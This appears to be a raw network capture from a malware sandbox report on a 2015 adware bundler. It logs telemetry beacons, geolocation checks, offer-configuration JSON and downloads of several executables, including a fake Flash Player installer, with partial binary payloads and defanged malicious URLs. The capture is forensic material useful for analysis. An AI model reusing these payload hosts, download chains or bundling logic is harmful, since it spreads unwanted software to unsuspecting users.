GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: k5bIf0I8TsFZu J4ql XPkz4iMrFrbXgTVyem4Nq5fEqJZ9 b7w5MzJAeIerNVm..x-amz-request-id: 2A77CADFFF654825..Date: Thu, 29 Oct 2015 07:31:15 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=3775 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: DrXGQoHGwzJzstNg10GkQJOXoTxcA0kmD9Uy7IWiu8IrGMhj FxIyDNsgGpKFSDa

x-amz-request-id: 62CE6D9C1696D2F3

Date: Thu, 29 Oct 2015 07:31:17 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: DrXGQoHGwzJzstNg10GkQJOXoTxcA0kmD9Uy7IWiu8IrGMhj FxIyDNsgGpKFSDa..x-amz-request-id: 62CE6D9C1696D2F3..Date: Thu, 29 Oct 2015 07:31:17 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=4473 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: lqhArZ1TfN8lUqnsY33ZPSOGfeAgDIZt5o3UgT9O1rvunQlFrqBaMnKOdZdGb64U

x-amz-request-id: FB65CBCBA2565DE4

Date: Thu, 29 Oct 2015 07:31:27 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: lqhArZ1TfN8lUqnsY33ZPSOGfeAgDIZt5o3UgT9O1rvunQlFrqBaMnKOdZdGb64U..x-amz-request-id: FB65CBCBA2565DE4..Date: Thu, 29 Oct 2015 07:31:27 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=8733 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: za9H2ePsoFOFOZZcW5s9M9khdLE0lUf05xcASPNTsTzfIXwApo5R8pSioe0oJgDE

x-amz-request-id: 37D13C07C962DD49

Date: Thu, 29 Oct 2015 07:31:28 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: za9H2ePsoFOFOZZcW5s9M9khdLE0lUf05xcASPNTsTzfIXwApo5R8pSioe0oJgDE..x-amz-request-id: 37D13C07C962DD49..Date: Thu, 29 Oct 2015 07:31:28 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..

GET / HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: ipgeoapi.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 29 Oct 2015 07:31:05 GMT

Connection: keep-alive

Content-Type: application/json;charset=utf-8

Content-Length: 40

Server: thin 1.4.1 codename Chromeo

Via: 1.1 vegur

{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Thu, 29 Oct 2015 07:31:05 GMT..Connection: keep-alive..Content-Type: application/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codename Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 115

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Thu, 29 Oct 2015 07:30:54 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 121

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Thu, 29 Oct 2015 07:30:54 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:30:54 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 177

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Thu, 29 Oct 2015 07:30:58 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:30:58 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 190

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Thu, 29 Oct 2015 07:30:59 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:30:59 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 181

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Thu, 29 Oct 2015 07:30:59 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:30:59 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 194

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Thu, 29 Oct 2015 07:30:59 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:30:59 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 183

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Thu, 29 Oct 2015 07:31:05 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:31:05 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 196

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Thu, 29 Oct 2015 07:31:05 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:31:05 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 173

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.randkeygen.com/crcb/123/installer.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Thu, 29 Oct 2015 07:31:07 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:31:07 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:31:09 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:31:10 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:31:10 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 164

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.djapp.info/?file=bundle&v=2&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Thu, 29 Oct 2015 07:31:14 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:31:14 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..

GET /crossbrowse/ie/107/ie.zip.003 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 29 Oct 2015 07:31:07 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441008913"

Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT

Cache-Control: max-age=35168

Content-Length: 8244985

Content-Type: text/plain; charset=UTF-8

X-HW: 1446103867.dop019.am4.t,1446103867.cds064.am4.c

l...%...J.....=.6...<.,........#....U.s.I.* m..e_O.'.x..4.SV..x...q...d.[.R...A_.....&........."b.....g.........^...N}...$............^..O.&.S....y.Q..vm.!.W........j.kt.......D....%G......*..$.k...@c".e...wu..b.3..oV.....G..ER...o.V..co....v.P..[}.....m.......3.;.E..r.O...{."..'V.-....V.L.4....RF. .:`....M.8..z....z.m....7>...<t?.)$g.'.....~..i.i..W..gV...vZV......dy.cec<F2.8..ZT.W...}d.m..m5..h^...../.@.c.F.....vW......<.PQ....I.8...L-...C...........<%....n..b.4.3gJ.h.D.U...8....PV80..R.so~..k..S QGp4.%.i..I..?...Z@%.B..U!1..m.3.........|7h..s.;V,WBbPQ}=.......%..o......hc........5.9...v|.t...<"....t.Z6.........f.4.3.H..Y ...d...C-.u...B.....RIK:.*$$JP.........q..v.-........$....q..@.../-.. 6Ie.....7....0b...NR.Ti.<U.@a.$.8.m`.i... ~.Y.)j0....%....M.... .CF?0......pd.........M......~m.8.#3b .>...3|`./|W.=../#7j\U..k..@7..G.1.K..?=J../ ?....M...U.`...P.2....A&'?.:oI...\.}6...=k..D..Jv..<HfG..).>p..?.R1....GUo._.mb.M" X...6........#...V$...........GX[R...=.xX.C ~N.2..!gs.(.o...qa.......y0..G......p$0. ^.`.@.*..)?....u.&...L......6....................Q$....4AJFn....kj...................q...Q.K;.E.}..\9eL..jO4.....N..Y.........}GD{.j.....d.c.(...uMK$.h.T........~0..T.<a......PPC..x..&.%`}."5...Q%.4RS..F>@T.}...;..w...zOoL....^DX.<..'.M.Nl\..E{(.}....5.s.(....a.[...,....@.xD.:$.D?.h...:T.=r./.VD.V......k.J..9.dC..g.>_.9.........(RiV......]...}....u7.J..:c.,...D....O..-..A.x.... PP..j;...b...TA..(.,]... r..........t.....5.7`H.)<6A...9.....tD...bl.]e....F....{ .....5..

<<< skipped >>>

GET /crossbrowse/ie/107/ie.zip.004 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 29 Oct 2015 07:31:07 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441008913"

Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT

Cache-Control: max-age=35172

Content-Length: 8244985

Content-Type: text/plain; charset=UTF-8

X-HW: 1446103867.dop019.am4.t,1446103867.cds035.am4.c

......."`...P.PB.............z.....R^z......cxT...x... ;K.....8..9i....|9..7...D..p[.2..!!.S.._.^..Z..W..8.@.'..\&!.!k...~..4.......f.V.u...0...^......,T;.....%......ch...F..c.........G.2../l.wr 1.&.?!..r.k.U....}%....w....}.2...}......oD.KX.G....p...s...$.W...c.Q.*<.4...Lz...@r.g;....~..w#..........`..@..m...){..$.......=z...J23..Bp....~.2.j.......pJ..X..C... .U.O5..h............._W...)#....:_lk.b.Z'..]..s0...6Y%..W........<...cP\Y..G.u.,U..B.og...8.C.~.8~..tj...t ....TT.-UQ....M.....1N-.x....P.p.#...wI..W...G.[.jO..Q.2.V1=..,/.......~..........."..Hma..se...^?.k....=...5...p.....I..G.hm. .vD....._...[.l...,.......s....O.....WU.v-:'.j..%...|....7.g...'..o1..._m.,.!.n.V.........Y5...}s<t..G.R3;R;8.....yP=.-.N...l{..r9..4.n&...U4..n..p.W....{d/l......*....!O*.j.}...%Q.....k.j..1=^.@G....!jI..5.....^7.O. ...DwR.....J/.@..4d."... ..$...#..........Xc.R>Vv.......;.d..C..W....'.....8 .*4Xw.drM.^...UE.C...]>.....ycA.... ....l..:..z..y....=I......9.........z.y......uX.... .T..........d-dj.7.d.!Q.qCqj.4.S{.&.".......s;..P.\.l..7...-OP....I...._\.YX2.6.Mb..._...5O.4....e..tyo...z.z.2.8..5........W..7......|.$............^..]..x...|...S...$....F.|_.SS......=...'...`rX....y...e.O..b...............U9hPfr..5KJ6;&.....d.d.......... .j....Wu.:...hk...a..s...]......?..T.]..8.cRN...........6..C=[.k....`......s]$.B, ....7;A......... ^.h~{..\:ybG.$..f.Q..l........#..FB.. ..........;.,RS.4].B-...N.EyNE...q.P_..g..}AY~_gz......42...%......Nx..D.D.!.]...[..o.1..&....."W.........nKK..).....<.x.@............?.m......c

<<< skipped >>>

GET /iqa/install_flash_player_ppapi.exe HTTP/1.1

Host: d22nes4susdva1.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 19198128

Connection: keep-alive

Date: Sat, 05 Sep 2015 01:26:25 GMT

Last-Modified: Tue, 11 Aug 2015 10:54:00 GMT

ETag: "c3f3ae94549aa626ea751c5e64e6314c"

Accept-Ranges: bytes

Server: AmazonS3

Age: 53613

X-Cache: Hit from cloudfront

Via: 1.1 3a3025640eaad9970531c0d9450c1606.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 4haewE7Av09soC0H4UNI-pzRODloIPaxcgeGugAf-m3jYZj5iUczpg==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GU...4...4...4...f...4...L...4..$....4..$....4...4...4...L..@4...L...4...f...4...4...4...L...4..Rich.4..........................PE..L......U......................"...................@.......................... %.....P.$...@.................................te............!...........$.......$.. ..................................X,..@...............`............................text...D........................... ..`.rdata..............................@..@.data...h?.......$...b..............@....rsrc.....!...... !.................@..@.reloc..Z0....$..2....$.............@..B..................................................................................................................................................................................................................................................................................................................................|..V.t$..D6.......P..|..Y.p..@...@.......^.... ..`......L$......I..H.....t..........t..@. A..3......t..I..DH..3..VW.|$...................;.~.2.. .B........LA..G....DB...NHHf..IIf;.u...u..._^...V.t$...W............w...;.~.2..0.j....J. ........LA..F..DB...O@@f..AAf;.u...u..._^......L$.V..........%...;.^u..t$..8.....t.3.@..3....SV....W..t..@...3. F.@..W.Q{.......F.Y...TB.......ABBOu._^.....[.....u...P..I.SVW3..tH.2.....vI...f..0s.f..9v.@@Ju...v1;.v.f.x.-u......f..0r.f..9w.k..@...@J.|..u...t....._^[..D$...t..

<<< skipped >>>

GET hXXp://json.lxhwspv.com/?adv_id=128&domain=LxHWSpv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en HTTP/1.1

Host: json.lxhwspv.com

HTTP/1.1 200 OK

Server: nginx

Date: Thu, 29 Oct 2015 07:35:17 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

373..{ .."advID":128, .."primaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."secondaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."requireUnzip":false, .."requireSuccessInstallCheck":true, .."requireExitCodeCheck":false, .."successExitCode":0, .."constParams":"-pub_id=353 -fb -taskbar -ext=pcjnhdkacfipfoicilllfabpbghiegpn",.."mappedParams":[], .."requireRegKeysCheck":true, .."regKeysToCheck":[.."LocalMachine\\SOFTWARE\\Sakura\\gamegogle=*",."LocalMachine\\SOFTWARE\\Wow6432Node\\Sakura\\gamegogle=*"..], .."minutesToSleepBeforeInstall":0,.."preInstallRegCheck": true,.."preInstallRegKeys": [ ..."LocalMachine\\SOFTWARE\\Sakura\\gamegogle=*",."LocalMachine\\SOFTWARE\\Wow6432Node\\Sakura\\gamegogle=*"..],.."blockIfInstalled" : false.}...0..HTTP/1.1 200 OK..Server: nginx..Date: Thu, 29 Oct 2015 07:35:17 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..373..{ .."advID":128, .."primaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."secondaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."requireUnzip":false, .."requireSuccessInstallCheck":true, .."requireExitCodeCheck":false, .."successExitCode":0, .."constParams":"-pub_id=353 -fb -taskbar -ext=pcjnhdkacfipfoicilllfabpbghiegpn",.."mappedPa

<<< skipped >>>

GET /?file=flash HTTP/1.1

Host: VVV.djapp.info

Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Thu, 29 Oct 2015 07:36:07 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Location: hXXp://d22nes4susdva1.cloudfront.net/iqa/install_flash_player_ppapi.exe

0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Thu, 29 Oct 2015 07:36:07 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..Location: hXXp://d22nes4susdva1.cloudfront.net/iqa/install_flash_player_ppapi.exe..0..

GET /crossbrowse/ie/107/ie.zip.002 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 29 Oct 2015 07:31:07 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441008912"

Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT

Cache-Control: max-age=35161

Content-Length: 8244985

Content-Type: text/plain; charset=UTF-8

X-HW: 1446103867.dop001.am4.t,1446103867.cds043.am4.c

.R...rf..ol......}>....]..m..sr!..m..Mu..v....\..F.....R...[y8...6...7...h.K.52.'.m];."......;........6.Q.Li.T[...<.....P..SJGtW....~......&.{h.X.;<.x...........iX..........qda.....P....6X.....@.(........... .....!E..t......-O..n..z..N.....4s....=0...xa.o....Q..P....z..oNiC. ...{..B.~..B..o.4...UO[.T....Y..f..*..G......h.1...B.I..1...;..3....(...;..M..Q.5..,F.._..$#..K.(..&...Y...O.Q(.>O......UP.<?2_... .%.D..*.H..y...5..U7.#.....J 7.8b...f.r64h.g ....'y.m..M.fW...e..Y.SG..D...a.h..auwR......v......_.s<E.O......Y..n-..hT..p.$J.`>......-...9.2.Is..5...v.~%{b.H.d).......w..m5......X..v~..!.:.K..xEzE...J...V....It..C6...~V6%...uG..bW...........)}..m..|nh..............wB;.M>.E.h..E0..9.....F.ew....J.J......_*4....*{..V(z..}q........u.:tfT...G9'....6......8.....h..r...`s/..kw.H.~...E..r_!.A.U....kbn......2..m]T&&.....p.p,6_.....~........;V.......:.....MI.Vs..'.(..@...B...S...O...<....q.IG....wB$.......Q.&.....4...{^....g..L...e8...b..(n.B<..b5...o......"......!.G.....m^......2.:...^...1xd[..h.^...I...c~.h.....Q.3tv"^k....!.G...d........=:.....5`a....ab$.r'3..:...l..&.d@p...P"..7..w..@.F:.x...o..j..W...%...Cz?.Np......~....GFP ;..Z.......2.~8....R...s......//.7.....l.U>....r.....{0.Gs:......`.pm......_{.".........#d..")..o..-.... ...E.J.....}.XhH;h...4j. ..E..3]g..9.!..T...``r.hwhEbP......L..S/Is|5..`....}|W(...8E76..7...*.l....Wuw....2.....cO..)4c..=X9..zwT...i.`..Rh.......ST.zLL.9..V.}<..<....5.>\H..,...(.l....q>..i2<~.E.F.....b.......\.....j1W.Q...o\s..}.<....$^w.

<<< skipped >>>

GET /SysInfo/Validate.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: download-servers.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Thu, 29 Oct 2015 07:30:54 GMT

Content-Type: application/octet-stream

Content-Length: 61981

Last-Modified: Fri, 15 May 2015 18:22:16 GMT

Connection: keep-alive

ETag: "55563958-f21d"

Accept-Ranges: bytes

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@.......................... ...............................................t...........C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....C.......D...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

